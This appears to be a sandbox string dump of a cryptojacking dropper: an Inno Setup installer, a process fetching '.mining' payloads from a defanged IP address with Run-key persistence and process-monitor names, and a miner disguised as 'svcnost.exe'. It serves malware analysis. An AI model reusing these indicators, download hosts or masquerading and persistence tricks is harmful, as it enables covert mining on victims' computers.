clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkgreen
clWebLimeGreen
clWebLime
clWebSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebLightCyan
clWebLightBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebIndigo
clWebMediumTurquoise
clWebTurquoise
clWebCyan
clWebPowderBlue
clWebSkyBlue
clWebRoyalBlue
clWebMediumBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebCadetBlue
clWebDarkCyan
clWebTeal
clWebDeepskyBlue
clWebDodgerBlue
clWebBlue
clWebNavy
clWebDarkViolet
clWebDarkOrchid
clWebMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebMediumOrchid
clWebMediumPurple
clWebPurple
clWebDeepPink
clWebLightPink
clWebViolet
clWebOrchid
clWebPlum
clWebThistle
clWebHotPink
clWebPink
clWebLightSteelBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebWhite
clWebLightgrey
clWebGray
clWebSteelBlue
clWebSlateBlue
clWebSlateGray
clWebWhiteSmoke
clWebSilver
clWebDimGray
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlategray
clWebGainsboro
clWebDarkGray
clWebBlack
msctls_hotkey32
Items.ItemData
RegDeleteKeyExW
.DEFAULT\Control Panel\International
%s, ClassID: %s
%s, ProgID: "%s"
oleacc.dll
MSFTEDIT.DLL
RICHED20.DLL
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
Rstrtmgr.dll
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
@Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
regsvr32.exe"
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
Could not find page with ID %d
Software\Microsoft\Windows\CurrentVersion\Uninstall
%s\%s_is1
RestartManager found an application using one of our files: %s
Can use RestartManager to avoid reboot? %s (%d)
PrepareToInstall failed: %s
Need to restart Windows? %s
/:*?"<>|
\/:*?"<>|
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.5.1.ee2 (u)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}
target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
RmShutdown returned an error: %d
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
QuerySpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected response: $%x
CallSpawnServer: Unexpected status: %d
ShellExecuteEx
ShellExecuteEx returned hProcess=0
Wnd=$%x
Expression error '%s'
srcexe
Cannot evaluate "%s" constant during Uninstall
Cannot access a 64-bit key in a "reg" constant on this version of Windows
Unknown custom message name "%s" in "cm" constant
Cannot expand "pf64" constant on this version of Windows
Cannot expand "cf64" constant on this version of Windows
uninstallexe
Cannot expand "dotnet2064" constant on this version of Windows
Cannot expand "dotnet4064" constant on this version of Windows
Failed to expand shell folder constant "%s"
Unknown constant "%s"
Software\Microsoft\Windows\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
cmd.exe
COMMAND.COM
\_setup64.tmp
_isetup\_shfoldr.dll
Failed to get version numbers of _shfoldr.dll
shfolder.dll
Failed to load DLL "%s"
Found pending rename or delete that matches one of our files: %s
Windows version: %u.%u.%u%s (NT platform: %s)
64-bit Windows: %s
Processor architecture: %s
Defaulting to %s for suppressed message box (%s):
Message box (%s):
User chose %s.
MsgBox failed.
/SPAWNWND=$%x /NOTIFYWND=$%x
64-bit install mode: %s
%d.%d
_isetup\_isdecmp.dll
_isetup\_iscrypt.dll
/Password=
/SuppressMsgBoxes
/DETACHEDMSG
-0.bin
Setup version: Inno Setup version 5.5.1.ee2 (u)
Original Setup EXE:
Windows NT
Not restarting Windows because Setup is being run from the debugger.
Restarting Windows.
Inno Setup version 5.5.1.ee2 (u)
Portions Copyright (C) 2000-2012 Martijn Laan
hXXp://VVV.innosetup.com/
hXXp://VVV.remobjects.com/ps
hXXp://restools.hanzify.org/
Cannot run files in 64-bit locations on this version of Windows
Type: Exec
Type: ShellExec
RmRestart returned an error: %d
Need to restart Windows, not attempting to restart applications
Will not restart Windows automatically.
RegDeleteKeyExA
System\CurrentControlSet\Control\Windows
Cannot assign a %s to a %s
Date exceeds maximum of %s
Date is less than minimum of %s
System Error. Code: %d.
Remove shared file %s? User chose %s%s
/INITPROCWND=$%x
/SECONDPHASE="%s" /FIRSTPHASEWND=$%x
Original Uninstall EXE:
Install was done in 64-bit mode but not running 64-bit Windows now
Removed all? %s
Not restarting Windows because Uninstall is being run from the debugger.
Cannot call "%s" function during Setup
Cannot call "%s" function during Uninstall
Invalid RootKey value
Unknown custom message name "%s"
%u.%.2u.%u
%u.%u.%u.%u
Cannot disable FS redirection on this version of Windows
Runtime Error (at %d:%d):
Exception "%s" at address %p
TScriptRunner.SetPSExecParameters: Invalid type
TScriptRunner.LoadScript failed
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
crSQLWait
%s (%s)
imm32.dll
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
isRS-???.tmp
isRS-%.3u.tmp
DisableProcessWindowsGhosting
Interface not supported
7Dispatch methods do not support more than 64 parameters
Exception: %s
Cannot Import %s
Out Of Stack Range Failed to get object at index %d"Failed to set tab "%s" at index %d Failed to set object at index %d<MultiLine must be True when TabPosition is tpLeft or tpRight
Invalid item level assignment Invalid level (%d) for item "%s"
Invalid owner %s is already associated with %sE%d is an invalid PageIndex value. PageIndex must be between 0 and %d=This control requires version 4.70 or greater of COMCTL32.DLL
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object
LError loading dock zone from the stream. Expecting version %d, but found %d.,Multiselect mode must be on for this feature
Error setting %s.Count8Listbox (%s) style must be virtual in order to set Count#No OnGetItem event handler assigned"PageControl must first be assigned#No context-sensitive help installed
No help found for %s
Failed to clear tab control Failed to delete tab at index %d"Failed to retrieve tab at index %d
Unable to insert a line Clipboard does not support Icons
Text exceeds memo capacity.There is no default printer currently selected/Menu '%s' is already being used by another form
%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active*A control cannot have itself as its parent
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'
%s property out of range
Unsupported clipboard format
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread$No help viewer that supports filters7String index out of range (%d). Must be >= 1 and <= %d[Invalid UTF32 character value. Must be >= 0 and <= $10FFF, excluding surrogate pair rangesrHigh surrogate char without a following low surrogate char at index: %d. Check that the string is encoded properlyrLow surrogate char without a preceding high surrogate char at index: %d. Check that the string is encoded properly
''%s'' is not a valid date#''%s'' is not a valid date and time#''%s'' is not a valid integer value
''%s'' is not a valid time
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
%s on line %d
Error reading %s%s%s: %s
Failed to get data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
%s expected$%s not in a class registration group#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid file name - %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s'
Line too long List capacity out of bounds (%d)
Invalid destination array"Character index out of bounds (%d)
Start index out of bounds (%d)
Invalid count (%d)
Invalid destination index (%d)
Ancestor for '%s' not found
''%s'' expectedECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)
Object lock not owned(Monitor support function not initialized
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
('%s' is not a valid floating point value
I/O error %d
Integer overflow Invalid floating point operation
n%USERPROFILE%
r%SYSTEMROOT%
5.50.4807.2300
Microsoft(R) Windows (R) 2000 Operating System
Datos de programa%Configuraci
51.1052.0.0

O2Og.exe_3620:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Found passed UNQ key
RegOpenKeyExA
Advapi32.dll
Software\Microsoft\Windows\CurrentVersion\Run
hXXp://82.146.54.187/
procexp.exe
Taskmgr.exe
WinDefender.exe
lel.arch
hXXp://82.146.54.187/CSD/64_8.mining
hXXp://82.146.54.187/CSD/32_2.mining
main_exe
CMD line:
URLs:
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
KERNEL32.dll
EnumChildWindows
EnumWindows
USER32.dll
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
DeleteUrlCacheEntry
WININET.dll
GetCPInfo
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\rWF5t\O2Og.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4L4J4v4
<.=4=8=<=@=
combase.dll
kernel32.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
mscoree.dll
USER32.DLL
portuguese-brazilian

svcnost.exe_4012:

.text
p`.data
.rdata
[email protected]
.idata
Montgomery Multiplication for x86, CRYPTOGAMS by <[email protected]>
SHA1 block transform for x86, CRYPTOGAMS by <[email protected]>
SHA256 block transform for x86, CRYPTOGAMS by <[email protected]>
DlSHA512 block transform for x86, CRYPTOGAMS by <[email protected]>
 \$$;\$<
6-9'6-9'
$6.:$6.:
*?#1*?#1
>8$4,8$4,
AES for x86, CRYPTOGAMS by <[email protected]>
GF(2^m) Multiplication for x86, CRYPTOGAMS by <[email protected]>
|$$ \$,)
D$.tF
-0123456789
libgcc_s_dw2-1.dll
libgcj-13.dll
asio.misc
asio.misc error
%d primes generated
Last Primorial Prime = %u
First Sieving Prime = %u
Primorial Size = %d-bit
No Inverse for prime %u at position %u
CBigNum::operator% : BN_div failed
CBigNum::operator- : BN_sub failed
CBigNum:operator<< : BN_lshift failed
CBigNum::operator/ : BN_div failed
CBigNum::operator  : BN_add failed
CBigNum::operator= : BN_copy failed
CBigNum::operator = : BN_add failed
$tIasio.misc
C:\Deps\boost_1_55_0/boost/thread/win32/thread_primitives.hpp
C:\Deps\boost_1_55_0/boost/thread/win32/thread_heap_alloc.hpp
detail::win32::HeapFree(detail::win32::GetProcessHeap(),0,heap_memory)!=0
thread.entry_event
thread.exit_event
C:\Deps\boost_1_55_0/boost/asio/detail/hash_map.hpp
it != values_.end()
C:\Deps\boost_1_55_0/boost/thread/win32/basic_timed_mutex.hpp
ERROR: %s
C:\Deps\boost_1_55_0/boost/smart_ptr/shared_ptr.hpp
[MASTER] Logged in With Address: %s Bytes: %u
Too Few Arguments. The Required Arguments are 'IP PORT ADDRESS'
Format for Arguments is 'IP PORT ADDRESS THREADS TIMEOUT'
Coinshield Prime Pool Miner 1.0.0 - Created by Videlicet - Optimized by Supercomputing
Using Supplied Account Address %s
Initializing Miner %s:%s Threads = %i Timeout = %i
Connected to %s:%s...
[METERS] %f PPS | Height = %u | Balance: %f CSD | Payout: %f CSD | d:d:d
[MASTER] Asking For New Block for Thread %u
[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Accepted]
[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Rejected]
[MASTER] Block Found | Difficulty %f | Hash %s | Thread %.2i --> [Accepted]
[MASTER] Share Found | Difficulty %f | Hash %s | Thread %.2i --> [Stale Share]
[MASTER] Coinshield Network: New Block %u.
[MASTER] Received Obsolete Block %u... Requesting New Block.
[MASTER] Block %s Height = %u Received on Thread %u
%s: __pos (which is %zu) > this->size() (which is %zu)
./boost/exception/detail/exception_ptr.hpp
boost thread: trying joining itself
Big Number part of OpenSSL 1.0.1h 5 Jun 2014
error:lX:%s:%s:%s
passed a null parameter
x509 certificate routines
DSO support routines
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
%s(%d): OpenSSL internal error, assertion failed: %s
x509_pkey
evp_pkey
ssl_cert
ssl_sess_cert
lhash part of OpenSSL 1.0.1h 5 Jun 2014
[d:d:d]
%5lu file=%s, line=%d,
number=%d, address=lX
thread=%lu, file=%s, line=%d, info="
%ld bytes leaked in %d chunks
Stack part of OpenSSL 1.0.1h 5 Jun 2014
dhKeyAgreement
challengePassword
extendedCertificateAttributes
nsCertExt
Netscape Certificate Extension
nsCertType
Netscape Cert Type
nsBaseUrl
Netscape Base Url
nsRevocationUrl
Netscape Revocation Url
nsCaRevocationUrl
Netscape CA Revocation Url
nsRenewalUrl
Netscape Renewal Url
nsCaPolicyUrl
Netscape CA Policy Url
nsCertSequence
Netscape Certificate Sequence
subjectKeyIdentifier
X509v3 Subject Key Identifier
keyUsage
X509v3 Key Usage
privateKeyUsagePeriod
X509v3 Private Key Usage Period
certificatePolicies
X509v3 Certificate Policies
authorityKeyIdentifier
X509v3 Authority Key Identifier
extendedKeyUsage
X509v3 Extended Key Usage
TLS Web Server Authentication
TLS Web Client Authentication
pbeWithSHA1And3-KeyTripleDES-CBC
pbeWithSHA1And2-KeyTripleDES-CBC
keyBag
pkcs8ShroudedKeyBag
certBag
localKeyID
x509Certificate
sdsiCertificate
id-smime-mod-msg-v3
id-smime-ct-publishCert
id-smime-aa-msgSigDigest
id-smime-aa-encrypKeyPref
id-smime-aa-signingCertificate
id-smime-aa-smimeEncryptCerts
id-smime-aa-ets-otherSigCert
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-certValues
id-smime-aa-ets-certCRLTimestamp
id-mod-qualified-cert-88
id-mod-qualified-cert-93
id-mod-attribute-cert
id-it-caProtEncCert
id-it-signKeyPairTypes
id-it-encKeyPairTypes
id-it-caKeyUpdateInfo
id-it-unsupportedOIDs
id-it-keyPairParamReq
id-it-keyPairParamRep
id-it-revPassphrase
id-regCtrl-oldCertID
id-regCtrl-protocolEncrKey
id-regInfo-certReq
id-cmc-getCert
id-cmc-confirmCertAcceptance
id-ecPublicKey
set-msgExt
set-certExt
certificate extensions
setct-AcqCardCodeMsg
setct-PCertReqData
setct-PCertResTBS
setct-CertReqData
setct-CertReqTBS
setct-CertResData
setct-CertInqReqTBS
setct-AcqCardCodeMsgTBE
setct-CertReqTBE
setct-CertReqTBEX
setct-CertResTBE
setCext-certType
setCext-cCertRequired
setAttr-Cert
set-rootKeyThumb
JOINT-ISO-ITU-T
joint-iso-itu-t
msSmartcardLogin
Microsoft Smartcardlogin
proxyCertInfo
Proxy Certificate Information
certicom-arc
certificateIssuer
X509v3 Certificate Issuer
id-PasswordBasedMAC
password based MAC
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-None-KeyMeshing
LocalKeySet
Microsoft Local Key set
supportedApplicationContext
userPassword
userCertificate
cACertificate
certificateRevocationList
crossCertificatePair
supportedAlgorithms
anyExtendedKeyUsage
Any Extended Key Usage
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
RAND part of OpenSSL 1.0.1h 5 Jun 2014
bn(%d,%d)
ASN.1 part of OpenSSL 1.0.1h 5 Jun 2014
ADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
USER32.DLL
SHA1 part of OpenSSL 1.0.1h 5 Jun 2014
SHA-256 part of OpenSSL 1.0.1h 5 Jun 2014
SHA-512 part of OpenSSL 1.0.1h 5 Jun 2014
rsa_keygen_bits
rsa_keygen_pubexp
hexkey
Public Key
%s algorithm "%s" unsupported
Private Key
Public-Key: (%d bit)
Private-Key: (%d bit)
PKCS#3 DH Private-Key
%s: (%d bit)
private-key:
public-key:
recommended-private-length: %d bits
PKCS#3 DH Public-Key
Private-Key
Public-Key
RSA part of OpenSSL 1.0.1h 5 Jun 2014
Diffie-Hellman part of OpenSSL 1.0.1h 5 Jun 2014
dh_key.c
pub_key
priv_key
DSA part of OpenSSL 1.0.1h 5 Jun 2014
ec_key.c
ECDSA part of OpenSSL 1.0.1h 5 Jun 2014
j <= (int)sizeof(ctx->key)
len>=0 && len<=(int)sizeof(ctx->key)
%d.%d.%d.%d
value.set
value.single
x_pubkey.c
X509_PUBKEY
public_key
Public key OCSP hash:
x%s
%s - d:d:d%.*s %d%s
%s - d:d:d %d%s
Certificate:
%8sVersion: %lu (0x%lx)
%s%lu (%s0x%lx)
s%s
x%c
Issuer:%c
Subject:%c
Subject Public Key Info:
sPublic Key Algorithm:
sUnable to load Public Key
PKCS8_PRIV_KEY_INFO
pkeyalg
pkey
%s %s%lu (%s0x%lx)
EC_PRIVATEKEY
privateKey
publicKey
value.named_curve
value.parameters
value.implicitlyCA
p.prime
p.char_two
p.other
p.onBasis
p.tpBasis
p.ppBasis
ASN1 OID: %s
Field Type: %s
Basis Type: %s
CMS_PasswordRecipientInfo
CMS_KeyAgreeRecipientInfo
CMS_OriginatorIdentifierOrKey
CMS_OriginatorPublicKey
CMS_RecipientEncryptedKey
CMS_KeyAgreeRecipientIdentifier
CMS_RecipientKeyIdentifier
CMS_OtherKeyAttribute
CMS_KeyTransRecipientInfo
CMS_CertificateChoices
CMS_OtherCertificateFormat
d.allOrFirstTier
d.receiptList
d.data
d.signedData
d.envelopedData
d.digestedData
d.encryptedData
d.authenticatedData
d.compressedData
d.other
d.ktri
d.kari
d.kekri
d.pwri
d.ori
keyDerivationAlgorithm
keyEncryptionAlgorithm
encryptedKey
keyIdentifier
recipientEncryptedKeys
d.issuerAndSerialNumber
d.subjectKeyIdentifier
d.originatorKey
d.rKeyId
keyAttrId
keyAttr
certificates
d.crl
d.certificate
d.extendedCertificate
d.v1AttrCert
d.v2AttrCert
otherCertFormat
otherCert
AES part of OpenSSL 1.0.1h 5 Jun 2014
ECDH part of OpenSSL 1.0.1h 5 Jun 2014
d.otherName
d.rfc822Name
d.dNSName
d.directoryName
d.ediPartyName
d.uniformResourceIdentifier
d.iPAddress
d.registeredID
openssl.cnf
EVP part of OpenSSL 1.0.1h 5 Jun 2014
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
keylen <= sizeof key
cert
key_enc_algor
enc_key
d.sign
d.enveloped
d.signed_and_enveloped
d.digest
d.encrypted
cert_info
OPENSSL_ALLOW_PROXY_CERTS
X.509 part of OpenSSL 1.0.1h 5 Jun 2014
\X
%*sAlias: %s
%*sKey Id:
%sX
%s:%s
%*s<Not Supported>
%*s%s
%*s%s:
%lu:%s:%s:%d:%s
%*s%s OF %s {
%s (%s)
ERROR: selector [%d] invalid
Unprocessed type %d
:EXTERNAL TYPE %s
PROXY_CERT_INFO_EXTENSION
%*sOnly User Certificates
%*sOnly CA Certificates
%*sOnly Attribute Certificates
name.fullname
name.relativename
Key Compromise
keyCompromise
Cessation Of Operation
cessationOfOperation
Certificate Hold
certificateHold
keylength
keyfunc
<unsupported>
othername:<unsupported>
X400Name:<unsupported>
EdiPartyName:<unsupported>
email:%s
DNS:%s
URI:%s
IP Address:%d.%d.%d.%d
pubkey
Key Encipherment
keyEncipherment
Key Agreement
keyAgreement
Certificate Sign
keyCertSign
v3_skey.c
PKEY_USAGE_PERIOD
%*sCPS: %s
%*sOrganization: %s
%*sNumber%s:
%*sExplicit Text: %s
CERTIFICATEPOLICIES
d.cpsuri
d.usernotice
keyid
v3_akey.c
EXTENDED_KEY_USAGE
%*scrlUrl:
%*sZone: %s, User:
%*sPolicy Text: %s
%d.%d.%d.%d/%d.%d.%d.%d
CONF part of OpenSSL 1.0.1h 5 Jun 2014
/usr/local/ssl/certs
/usr/local/ssl/cert.pem
SSL_CERT_DIR
SSL_CERT_FILE
p12_key.c
X509_CERT_PAIR
X509_CERT_AUX
AUTHORITY_KEYID
ddddddZ
ddddddZ
priv [ %d ]
cont [ %d ]
appl [ %d ]
<ASN1 %d>
'() ,-./:=?
x -
%sx - <SPACES/NULS>
Enter PEM pass phrase:
phrase is too short, needs to be at least %d chars
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
PRIVATE KEY
X509 CERTIFICATE
CERTIFICATE
NEW CERTIFICATE REQUEST
CERTIFICATE REQUEST
TRUSTED CERTIFICATE
PEM part of OpenSSL 1.0.1h 5 Jun 2014
certs-only
MIME-Version: 1.0%s
protocol="%ssignature";
"; boundary="----%s"%s%s
This is an S/MIME signed message%s%s
------%s%s
%s------%s%s
Content-Type: %ssignature;
name="smime.p7s"%s
Content-Transfer-Encoding: base64%s
filename="smime.p7s"%s%s
%s------%s--%s%s
name="%s"%s
Content-Transfer-Encoding: base64%s%s
filename="%s"%s
Content-Type: %smime;
smime-type=%s;
-----BEGIN %s-----
-----END %s-----
evp_pkey.c
MD5 part of OpenSSL 1.0.1h 5 Jun 2014
OCSP_CERTSTATUS
OCSP_CERTID
crlUrl
certs
certId
certStatus
value.good
value.revoked
value.unknown
value.byName
value.byKey
reqCert
issuerKeyHash
[%s] %s=%s
[[%s]]
CONF_def part of OpenSSL 1.0.1h 5 Jun 2014
nkey <= EVP_MAX_KEY_LENGTH
evp_key.c
?456789:;<=
!"#$%&'()* ,-./0123
value.keybag
value.shkeybag
value.safes
value.bag
value.other
value.x509cert
value.sdsicert
Verifying - %s
GNU MP assertion failed: %s
%m/%d/%y
%H:%M:%S
not enough space for format expansion (Please submit full bug report at hXXp://gcc.gnu.org/bugs.html):
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
0123456789
Assertion failed: (%s), file %s, line %d
M%p %d %s
M%p %d V=%0X B=%d t=%d o=%d C=%d R=%d H=%p %s
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
C%p %d %s
C%p %d V=%0X w=%ld %s
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
N5boost4asio21stream_socket_serviceINS0_2ip3tcpEEE
N5boost4asio2ip16resolver_serviceINS1_3tcpEEE
N5boost4asio6detail12service_baseINS0_21stream_socket_serviceINS0_2ip3tcpEEEEE
N5boost4asio6detail12service_baseINS0_2ip16resolver_serviceINS3_3tcpEEEEE
N5boost4asio6detail14typeid_wrapperINS0_21stream_socket_serviceINS0_2ip3tcpEEEEE
N5boost4asio6detail14typeid_wrapperINS0_2ip16resolver_serviceINS3_3tcpEEEEE
N5boost6detail17sp_counted_impl_pINS_4asio19basic_stream_socketINS2_2ip3tcpENS2_21stream_socket_serviceIS5_EEEEEE
N5boost6detail17sp_counted_impl_pISt6vectorINS_4asio2ip20basic_resolver_entryINS4_3tcpEEESaIS7_EEEE
GCC: (i686-posix-dwarf-rev0, Built by MinGW-W64 project) 4.8.3
GCC: (i686-posix-dwarf-rev1, Built by MinGW-W64 project) 4.9.1
GCC: (i686-posix-dwarf-rev2, Built by MinGW-W64 project) 4.9.0
GCC: (i686-posix-sjlj-rev0, Built by MinGW-W64 project) 4.8.3
ReportEventA
CreateIoCompletionPort
GetProcessHeap
_acmdln
_amsg_exit
GetProcessWindowStation
ADVAPI32.dll
GDI32.dll
KERNEL32.dll
msvcrt.dll
USER32.dll
WS2_32.dll
c%m/%d/%y
File: %ws, Line %u
emsvcrt.dll

conhost.exe_4084:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
|%SWj
O.fBf;
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
